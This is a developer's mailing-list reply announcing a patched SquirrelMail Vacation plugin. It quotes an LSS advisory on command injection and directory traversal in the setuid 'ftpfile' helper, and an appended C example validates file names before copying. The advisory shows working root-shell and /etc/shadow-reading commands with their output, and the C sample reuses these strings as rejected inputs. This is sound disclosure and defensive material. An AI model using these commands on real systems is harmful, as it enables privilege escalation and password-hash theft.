
Re: Squirrelmail vacation v0.15 local root exploit



All,

A new release of this plugin that addresses this exploit is now available at:

http://www.squirrelmail.org/plugin_view.php?id=51

Due to the severity of the exploits in prior versions, upgrade is highly recommended. Also, please keep in mind that while the SquirrelMail team takes security very seriously, it cannot take full responsibility for the plethora of third-party plugins, of which this is one. LSS team: pleeeease let us know *before* you are going to make your announcement next time.

 - Paul Lesniewski



                        LSS Security Advisory #LSS-2005-01-03
                               http://security.lss.hr

---

Title                   :  Squirrelmail vacation v0.15 local root exploit
Advisory ID             :  LSS-2005-01-03
Date                    :  10.01.2005.
Advisory URL            :  http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact                  :  Privilege escalation and arbitrary file read
Risk level              :  High
Vulnerability type      :  Local
Vendors contacted       :  No response from vendor


---



===[ Overview

The Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message for incoming email. This is commonly used to notify the sender of the receiver's absence. The Vacation plugin specifically uses the Vacation program.
The plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz



===[ Vulnerability

Within the Squirrelmail Vacation plugin there is a suid root program 'ftpfile'.
The program is used to access local files in the user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile. Command line arguments are passed to the execve() function without checking
for meta-characters, therefore making it possible to execute commands as root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$  ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$
It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from the user's home directory to any other
directory without checking the file name for directory traversal attacks.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow
[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$


===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.



===[ Fix

Not available yet.



===[ PoC Exploit

http://security.lss.hr/exploits/



===[ Credits

Credit for this vulnerability goes to Leon Juranic.


===[ LSS Security Contact

LSS Security Team, <eXposed by LSS>
 WWW    : http://security.lss.hr
 E-mail : security@xxxxxx
 Tel    : +385 1 6129 775
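The advisory above describes two defects in a setuid helper: a user-supplied argument that reaches a command interpreter without filtering, and a file-name argument that is accepted without any check for directory traversal. The C example below is added by the editor and is not part of the LSS advisory, the plugin, or the ftpfile program; it shows the two checks a helper of this kind needs before touching a file on the user's behalf: a strict allow-list on the file name (rejecting path separators, "." and "..", a leading '-' and any shell metacharacter) and a copy routine that runs /bin/cp through execve() with a fixed argument vector and no shell, so argument contents are never re-parsed as a command line. The function names, the home directory /home/alice and the sample file names are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Returns 1 if `name` is acceptable as a single file name inside the
 * caller's home directory: non-empty, not "." or "..", no leading '-'
 * (cp would read it as an option), and only characters from a
 * conservative allow-list. A '/' or ';' anywhere fails the allow-list,
 * which covers both problems the advisory describes. */
int safe_filename(const char *name)
{
    size_t len;
    if (name == NULL) return 0;
    len = strlen(name);
    if (len == 0 || len > 255) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    if (name[0] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Builds "<home>/<name>" into `out`, refusing names that fail
 * safe_filename(), a non-absolute home, or a result that would not fit.
 * Returns 1 on success, 0 otherwise. */
int build_home_path(const char *home, const char *name, char *out, size_t outlen)
{
    int n;
    if (!safe_filename(name)) return 0;
    if (home == NULL || home[0] != '/') return 0;
    n = snprintf(out, outlen, "%s/%s", home, name);
    return n > 0 && (size_t)n < outlen;
}

/* Copies src to dst by exec'ing /bin/cp with a fixed argv and an empty
 * environment; no shell is involved, so metacharacters in the arguments
 * have no special meaning. Returns cp's exit status, or -1 on failure. */
int copy_without_shell(const char *src, const char *dst)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/cp", "--", (char *)src, (char *)dst, NULL };
        char *const envp[] = { NULL };   /* do not inherit the caller's environment */
        execve("/bin/cp", argv, envp);
        _exit(127);                      /* only reached if execve fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample arguments: one benign name and four that a
     * setuid helper must refuse. */
    const char *samples[] = {
        "report.txt", "LSS-Security;id", "../../../../etc/shadow", "-rf", ".."
    };
    char path[4096];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int ok = build_home_path("/home/alice", samples[i], path, sizeof path);
        printf("%-26s -> %s\n", samples[i], ok ? path : "rejected");
    }
    return 0;
}
```

The allow-list is deliberately narrower than what a filesystem permits; for a privileged helper that only ever handles a user's own vacation files, rejecting unusual names is the cheaper failure mode. The copy routine is included to show the exec pattern; the demonstration in main() stays on the validation step so it does not write to the filesystem.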